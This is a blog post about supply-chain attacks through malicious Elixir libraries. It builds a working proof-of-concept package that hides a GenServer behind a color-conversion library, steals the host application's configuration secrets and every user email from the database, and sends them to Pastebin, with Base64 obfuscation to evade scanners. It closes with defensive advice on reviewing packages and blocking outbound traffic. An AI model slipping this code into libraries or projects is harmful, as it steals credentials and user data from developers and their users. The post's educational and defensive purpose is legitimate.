Hey! I recorded two video courses!
If you like this article, you will also like the courses! Check them out here!
Welcome back, folks!
My girlfriend broke up with me
when she found out I only had 9 toes.
She was lack toes intolerant.
Alright. Today, we’ll take a look at security issues when using third-party libraries in your Elixir applications. If you add libraries to your application, you could get robbed of all your secrets and user data. I’ll show you what a malicious library could look like and how you can protect yourself against this. So hang on and let’s get cracking!
🔗 The Problem
We all use libraries to develop our software. Usually, the process of adding a library is simple. You google a problem, find a library that fixes it, and add it to your mix.exs
file. You run mix deps.get
, check if the library does what it promised, and push everything to production. Easy.
But when you add a library, you copy somebody else’s code into your application. So, how do you know that it’s not malicious? You might say: I don't. I trust it.
and you wouldn’t be alone. I do this too, but we shouldn’t.
Malicious. libraries. are. not. uncommon.
The biggest problem is when attackers publish malicious libraries to a package manager like npm
, RubyGems
, or hex
. They become immediately available to millions of developers and installing them only requires bumping a version number. With little effort, attackers can compromise a lot of targets.
There’s a myriad of ways how a malicious library can get into a package manager, but these are the most common ones:
The attacker publishes the library. This is the easiest way, but the attacker has to generate traction for the library first. People have to start using the library before you can compromise them. This takes the most effort on the attacker’s side because the library must offer some value that convinces the users to add it. The attacker would most likely try to add the library as a dependency to an existing library with a pull request on GitHub. Still, there’s an easier method.
The attacker takes over an existing library. This is the easiest and fastest way for an attacker to publish a malicious library. They can take over an existing library, add malicious code, and publish a new version. Existing users will bump the version number and start using the malicious version of the library usually without noticing. The attacker can take over an existing library through legal ways, for example by taking over ownership of a library that needs a new maintainer. That’s why maintainer vetting is crucial for popular libraries.
The attacker could also try to steal the GitHub credentials of an author of a popular library and publish a malicious version under their name. So, if you’re the author of a library, better protect your account as much as possible. You might not notice that your credentials are stolen until it’s too late.
The most difficult version would be a supply-chain attack where an attacker penetrates the servers on which the library is compiled before it gets published. Before the compilation, the attacker can add malicious code and nobody would notice. This is the nastiest attack because nobody would notice unless they compare the code on the package manager with the code on GitHub, which nobody does. Some libraries come as compiled binaries, so you couldn’t even compare raw code but would have to compile and compare the binaries of your library against the version on the package manager. Unless you automate this step, you’d never do it.
The attacker takes over a retired/deleted library. Most package managers don’t allow this, but it might happen that an author deletes an existing library and the attacker publishes a new library with the same name and version right after. The new library would contain the same code as the old one plus some malicious nastiness. The worst thing is that victims wouldn’t even need to bump a version number. When they redeploy their server, they would re-fetch the same library with the same version but would now get a malicious version instead. Many package managers block the names of retired libraries.
So, I hope that you now understand that trusting your dependencies blindly is a bad thing.
To drive home my argument, I will show you exactly how we can build a malicious library with Elixir. Now, I’m not revealing any well-kept secrets here. Writing the library took me 2 hours and a few ChatGPT prompts, so anybody could do it. Let’s dive in.
🔗 The Library
The library is very simple. All it does is convert HEX
color codes into RBG
values. Here’s what the main module looks like:
defmodule Colors.Convert do
def hex_to_rbg(hex) do
hex = String.replace(hex, "#", "")
<<r::binary-size(2), g::binary-size(2), b::binary-size(2)>> = hex
{r, ""} = Integer.parse(r, 16)
{g, ""} = Integer.parse(g, 16)
{b, ""} = Integer.parse(b, 16)
{r, g, b}
end
end
Now, the point of this exercise is to add nastiness to an otherwise harmless-looking library, so let’s do that.
🔗 Starting the Attack Process
For our maliciousness, we will take advantage of the fact that Elixir starts the GenServers of dependencies that define an Application
. So, when the main app starts, the processes of all dependencies start as well. This is great for spinning up a GenServer that steals all your secrets, so let’s do it.
This is how the application of our library would look like:
defmodule Attack.Application do
use Application
@impl true
def start(_type, _args) do
children = [
Attack.Worker
]
opts = [strategy: :one_for_one, name: Attack.Supervisor]
Supervisor.start_link(children, opts)
end
end
You might notice that we renamed the Colors
namespace to Attack
here. This way, autocomplete will not expose our maliciousness. If a user wants to use our library, they will most likely type Colors.
and hit tab
to see all possible functions. In that case, we don’t want that list to show our nasty functions as well, so we put all our malicious modules under the Attack
namespace.
Next, let’s look at the module that will execute the attack:
defmodule Attack.Worker do
use GenServer
require Logger
def start_link(init_args) do
GenServer.start_link(__MODULE__, [init_args])
end
def init(_args) do
schedule_attack()
{:ok, :initial_state}
end
defp schedule_attack() do
Process.send_after(self(), :attack, 60_000)
end
def handle_info(:attack, state) do
# This is where we'll steal the secrets.
{:noreply, state}
end
end
The module is simple: It defines a GenServer that starts up and schedules a message called :attack
for 60 seconds in the future. The reason why we delay the attack is that we want to wait until the entire application - including Ecto Repos - is started. This way, we know that the application started successfully and the configuration is correct.
🔗 Stealing your Application Config
The first thing that we’ll do is steal the entire application configuration, including all loaded environment variables. This is how:
def handle_info(:attack, state) do
repos = apply(Ecto.Repo, :all_running, [])
Enum.each(repos, &steal_config/1)
{:noreply, state}
end
defp steal_config(repo) do
app = Application.get_application(repo)
config = Application.get_all_env(app)
# This is where we'll post the config to Pastebin later.
end
First, we want to read out the config for the running application. There’s no way (that I know) of finding out the “parent” application that uses a library, so we have to create a workaround. First, we fetch all running Ecto.Repos
. But we don’t want our library to depend on Ecto. The user might get suspicious why our color-converting library needs Ecto. But if we call Ecto.Repo.all_running()
here, the compiler will throw a warning that Ecto.Repo
is undefined. So, we use the apply/3
function instead. This way, we can still call Ecto.Repo.all_running()
at runtime, but the compiler won’t complain.
Next, we iterate through all running repos and get the application that is running them. This way, we can read the application’s config using Application.get_all_env(app)
. Now, we have all configurations of the running app. This will include everything from database credentials to the secret key base of a Phoenix application to potentially secret API keys for interacting with external services. Great!
🔗 Posting the Secrets to Pastebin
Now, stealing the application config doesn’t help us if we can’t get it off the server and onto a platform where we can read it. Let’s use Pastebin for that. Pastebin lets you create text files with a simple API call. Now, we could also send the configuration back to a server under our control. This is called a Command and Control (CnC) server. For this purpose though, Pastebin will suffice.
For posting the config to Pastebin, we don’t want to depend on a third-party library that might give us away. Therefore, we will use erlang’s built-in :httpc
client. It allows us to make HTTP requests to Pastebin. Here’s how:
defp send_secret(secret) do
:inets.start()
url = "https://pastebin.com/api/api_post.php"
payload =
"api_dev_key=MY_DEV_KEY&api_option=paste&api_paste_private=2&api_user_key=MY_USER_KEY&api_paste_code=#{inspect(secret)}"
:httpc.request(:post, {url, [], ~c"application/x-www-form-urlencoded", payload}, [], [])
end
As you can see, :httpc
is pretty low-level, but trust me when I say that the code above makes a POST
request to Pastebin with some form data. The parameters that we send here are:
-
api_dev_key
: The access key to Pastebin’s API. I generated this by signing up to Pastebin with a masked email. -
api_option
: Tells Pastebin that we want to paste the content into a new file. -
api_paste_private
: Tells Pastebin to make the new file private so that only we can read it. We don’t want other people to see the configuration on Pastebin. -
api_user_key
: Tells Pastebin which user the file shouldn’t be connected to (my profile). If we don’t provide this parameter, we can’t make the file private. -
api_paste_code
: The stolen configuration. We can send any text here.
You can find the full code on GitHub.
And that’s it! Now, we will steal the application’s configuration and post it on Pastebin from where we can then retrieve it for further malicious activities. Here’s a screenshot of how the file looks like on Pastebin:
🔗 Stealing your User Data
Now that we can steal any secrets and post them to Pastebin, let’s go one step further and steal all user data stored in the database. Our library can execute raw SQL, so let’s leverage that. First, we want to find all tables that contain a field called email
or emails
. Then, we’ll extract all emails stored in these tables and send them off to Pastebin. Here’s the code for that:
def handle_info(:attack, state) do
repos = apply(Ecto.Repo, :all_running, [])
Enum.each(repos, &steal_config/1)
Enum.each(repos, &steal_emails/1)
{:noreply, state}
end
defp steal_emails(repo) do
tables = get_tables_with_emails(repo)
Enum.each(tables, fn table -> do_steal_emails(repo, table) end)
end
defp get_tables_with_emails(repo) do
query = """
SELECT table_name
FROM information_schema.columns
WHERE column_name in ('email', 'emails');
"""
{:ok, result} = apply(Ecto.Adapters.SQL, :query, [repo, query])
List.flatten(result.rows)
end
defp do_steal_emails(repo, table) do
query = "SELECT email FROM #{table}"
{:ok, result} = apply(Ecto.Adapters.SQL, :query, [repo, query])
emails = List.flatten(result.rows)
send_secret(emails)
end
Let’s walk through the code above. First, we go through every repo and execute a SQL query that returns all tables that contain the column email
or emails
. If you generated your authentication system with mix phx.gen.auth
, your users
table will have this column.
Next, for all tables that contain an email
column, we retrieve all user emails, which are usually stored in plaintext. We then send off the list of emails through :httpc
to Pastebin using the send_secret/1
function.
And that’s it! We have now stolen the application configuration and the email address of all users. Nice!
I will stop here, but I hope you get the idea. Any library that you pull into your application can access pretty much everything. You should be very careful with the libraries that you use.
I didn’t dive into all possible ways that a third-library could compromise your application. Be aware that a library has access to everything, even your file system. So, it could also remove all your files and folders and wipe your entire server if it wanted to.
Now, your first instinct might be: I'll just read all code from all libraries on GitHub before using them!
. Sadly, I have bad news for you. The code that you download from Hex.pm might not be the code that you see on GitHub. So, if you read the code, make sure to do it on Hex.pm. As far as I know, Hex does not whether these are the same. You could create a checksum of the code on GitHub and compare it with the checksum that Hex gives you, but that might be tedious.
🔗 How to protect yourself
You might think now: That's terrible! How can I protect myself?
and unfortunately, there’s no easy answer. However, I reached out to the Hex Core Team and got some useful tips by the incredibly helpful Wojtek Mach.
I also asked Michael Lubas for suggestions. Michael is the founder of Paraxial.io, a cybersecurity firm focused on Elixir applications. Here is what they had to say.
According to Wojtek, the Hex package manager conducts no security scanning of its packages and would not have flagged the attacks above. Security scans like checking for HTTP calls to Pastebin are pointless because attackers can circumvent the scans easily by obfuscating the code. For example, we can obfuscate the :httpc
-call above by Base64 encoding both the :httpc
atom and the URL:
apply("aHR0cGM=" |> Base.decode64!() |> String.to_atom(), :request, [Base.decode64!("aHR0cHM6Ly9wYXN0ZWJpbi5jb20=")])
# This is equal to:
apply(:httpc, :request, ["https://pastebin.com"])
Hex does reserve library names forever though. Even if you retire a package, nobody can take over the library name. So, that at least is one less headache.
Now, here is what you can do to reduce the risk of adding malicious libraries to your project.
🔗 Read the Code
First, before you add a library, go through its code on Hex.pm not on GitHub. Hex doesn’t check whether the code of a package is equal to its GitHub repository. So, a library might have different code on GitHub than on Hex.pm. To read the library code on Hex, click on the little <>
sign next to its latest version. After reading through a library’s code, you unfortunately also have to read through the code of its dependencies. Hex shows you a list of all dependencies next to the package versions.
The last step before adding the library is checking the publisher. Hex shows you the profile of who published a library in the package overview. You should check that the person that maintains the code on e.g. GitHub also publishes the package. If not, check the publisher thoroughly and make sure that it’s not an attacker that took somebody’s code and published another library with a similar name to the original library.
Here is where you can find these options on hex.pm:
🔗 Check library updates
After you add a library, you should re-read the code for every new version before updating. Luckily, Hex offers a convenient way to see the changes between the new to the old version. You can go to diff.hex.pm, enter the library name, and select the previous version and the version you want to update. You can also open the diff view on the package side by clicking on the little page icon next to a version number. See the screenshot above.
Lastly, you can list your dependencies and their latest version using mix hex.outdated
. This will generate a list of all packages, their version in your application, their latest version, and whether you can update to them automatically. At the end of the output, hex provides a link to diff.hex.pm
that lists all packages to which you can update automatically.
Dependency Current Latest Status
httpoison 1.8.2 2.1.0 Update not possible
phoenix 1.7.6 1.7.7 Update possible
phoenix_live_view 0.19.3 0.19.5 Update possible
phoenix_view 2.0.2 2.0.2 Up-to-date
postgrex 0.17.1 0.17.2 Update possible
Run `mix hex.outdated APP` to see requirements for a specific dependency.
To view the diffs in each available update, visit:
https://hex.pm/l/QKnyu
If you click the link at the end of the output, you will open a website that looks like this:
🔗 Block outbound Traffic
A typical failsafe for preventing malicious libraries from “phoning home” is to block outbound traffic from the servers by default. In our case, the malicious library sends our secrets to Pastebin via HTTP call. If we block outgoing requests, we still have a malicious library in our application, but at least we prevented the extraction of our secrets.
Not every hosting provider offers such functionality out-of-the-box sadly. Usually, you have to install software like Stripe’s Smokescreen that adds a layer of protection to your servers. Here’s how to add Smokescreen to Fly.io. After adding this, you can configure which external URLs you allow and Smokescreen will block everything else. It’s not easy to set up and maintain, but it will be worth it if you get attacked.
🔗 Audit your System
Ideally, you read all code of every library and of all their dependencies, but let’s be honest: Unless you’re extremely security-focused, you probably won’t do that. Luckily, there are security experts like Michael out there who do it for you (for a price obviously). Just make sure that you add your third-party libraries to the scope of a security audit when you enlist a pentester.
I leave one honorable mention for mix hex.audit
which warns you if you depend on a retired hex package. Most of the time, this won’t do anything, but without it, you might not notice you rely on a retired library that won’t receive future maintenance and security updates. So, better put mix hex.audit
in your build pipeline and forget about it.
🔗 Last Words
I hope this post didn’t make you panic and call for an emergency staff meeting. Yes, very bad things can happen and you should keep that in mind. But you can mitigate the risk. Just be careful when you add a library. Avoid it when you can. And if you have to, make sure it comes from a reputable source and skim through its code. Block all outbound traffic if you can.
🔗 Conclusion
And that’s it! I hope you enjoyed this article! If you want to support me, you can buy my book or video course. Follow me on Twitter or subscribe to my newsletter below if you want to get notified when I publish the next blog post. Until the next time! Cheerio 👋